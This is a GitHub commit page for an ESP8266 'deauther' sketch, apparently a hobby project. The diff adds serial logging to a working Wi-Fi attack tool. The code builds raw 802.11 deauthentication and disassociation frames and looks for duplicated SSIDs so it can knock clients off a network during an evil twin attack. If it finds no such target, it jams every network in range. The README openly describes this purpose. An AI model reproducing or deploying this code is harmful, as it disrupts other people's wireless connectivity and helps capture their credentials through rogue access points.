Log deauther activity

tomellericcardo · Apr 25, 2020 · be686f8 · be686f8
1 parent dc178e4
commit be686f8
Show file tree

Hide file tree

Showing 2 changed files with 32 additions and 24 deletions.
diff --git a/deauther/README.md b/deauther/README.md
@@ -8,6 +8,3 @@ In order to compile and flash this sketch on your ESP8266, you need to use a spe
 At the moment, this program works fine with a headless setup: when powering up the device, it will scan nearby networks and it will look for two access points with the same SSID. In that case, it will start to deauthenticate all client devices of the protected one (so it's easy to use alongside your main device performing an evil twin attack).
 
 If it can't find any duplicated access point within a minute, it will start to deauthenticate all networks.
-
-## To do
-- Log target devices and deauthentication frames counter
diff --git a/deauther/deauther.ino b/deauther/deauther.ino
@@ -1,13 +1,13 @@
 #include <ESP8266WiFi.h>
-
 extern "C" {
   #include "user_interface.h"
 }
 
 
-#define BAUD_RATE 9600
-#define SCAN_PERIOD 5000
+#define BAUD_RATE       9600
+#define SCAN_INTERVAL   5000
 #define MAX_SCAN_CYCLES 10
+#define MAX_ATTEMPTS    10
 
 struct ap {
   String SSID;
@@ -20,21 +20,21 @@ long lastScanMillis;
 int noTargetCounter;
 
 uint8_t deauthPacket[26] = {
-    0xC0, 0x00,                         //  0 - 1  : Type, Subtype (C0: Deauthenticate, A0: Disassociate)
-    0x00, 0x00,                         //  2 - 3  : Packet Duration
-    0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, //  4 - 9  : Destination Address (Broadcast)
-    0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, // 10 - 15 : Source Address
-    0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, // 16 - 21 : Source Address
-    0x00, 0x00,                         // 22 - 23 : Fragment, Sequence Number
-    0x01, 0x00                          // 24 - 25 : Reason Code (1: Unspecified Reason)
+    0xC0, 0x00,                           //  0 - 1  : Type, Subtype (C0: Deauthenticate, A0: Disassociate)
+    0x00, 0x00,                           //  2 - 3  : Packet Duration
+    0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,   //  4 - 9  : Destination Address (Broadcast)
+    0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,   // 10 - 15 : Source Address
+    0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,   // 16 - 21 : Source Address
+    0x00, 0x00,                           // 22 - 23 : Fragment, Sequence Number
+    0x01, 0x00                            // 24 - 25 : Reason Code (01: Unspecified Reason)
 };
 
 
 void setup() {
   Serial.begin(BAUD_RATE);
   WiFi.mode(WIFI_STA);
   WiFi.disconnect();
-  delay(10000);
+  delay(1000);
   noTargetCounter = 0;
 }
 
@@ -68,24 +68,30 @@ int getTargets(ap targets[], ap accessPoints[], int n) {
   return m;
 }
 
-bool sendDeauthPacket(int channel) {
+bool sendPacket(int channel) {
   wifi_set_channel(channel);
   bool sent = wifi_send_pkt_freedom(deauthPacket, 26, 0) == 0;
-  for (int i = 0; i < 10 && !sent; i++)
+  for (int i = 0; i < MAX_ATTEMPTS && !sent; i++)
     sent = wifi_send_pkt_freedom(deauthPacket, 26, 0) == 0;
   return sent;
 }
 
 void attack(ap targets[], int n) {
+  Serial.println("\nStarting attack ...");
   while (true) {
     for (int i = 0; i < n; i++) {
       ap currentAP = targets[i];
       memcpy(&deauthPacket[10], currentAP.BSSID, 6);
       memcpy(&deauthPacket[16], currentAP.BSSID, 6);
-      deauthPacket[0] = 0xc0;
-      sendDeauthPacket(currentAP.channel);
-      deauthPacket[0] = 0xa0;
-      sendDeauthPacket(currentAP.channel);
+      Serial.print("\nDeauthenticating ");
+      Serial.println(currentAP.SSID);
+      deauthPacket[0] = 0xC0;
+      bool d1 = sendPacket(currentAP.channel);
+      Serial.print("Disassociating ");
+      Serial.println(currentAP.SSID);
+      deauthPacket[0] = 0xA0;
+      bool d2 = sendPacket(currentAP.channel);
+      Serial.println((d1 && d2) ? "DONE!" : "ERROR!");
     }
     delay(100);
   }
@@ -94,22 +100,27 @@ void attack(ap targets[], int n) {
 void loop() {
 
   long currentMillis = millis();
-  if (currentMillis - lastScanMillis > SCAN_PERIOD) {
+  if (currentMillis - lastScanMillis > SCAN_INTERVAL) {
+    Serial.println("\nScanning ...");
     WiFi.scanNetworks(true);
     lastScanMillis = currentMillis;
   }
 
   int n = WiFi.scanComplete();
-  if (n > 0) {
+  if (n >= 0) {
+
+    Serial.printf("Found %d network(s)\n", n);
 
     ap accessPoints[n];
     getAccessPoints(accessPoints, n);
 
-    if (noTargetCounter > MAX_SCAN_CYCLES)
+    if (noTargetCounter > MAX_SCAN_CYCLES) {
+      Serial.println("Attacking all ...");
       attack(accessPoints, n);
-    else {
+    } else {
       ap targets[n];
       int m = getTargets(targets, accessPoints, n);
+      Serial.printf("Found %d target(s)\n", m);
       if (m > 0) attack(targets, m);
     }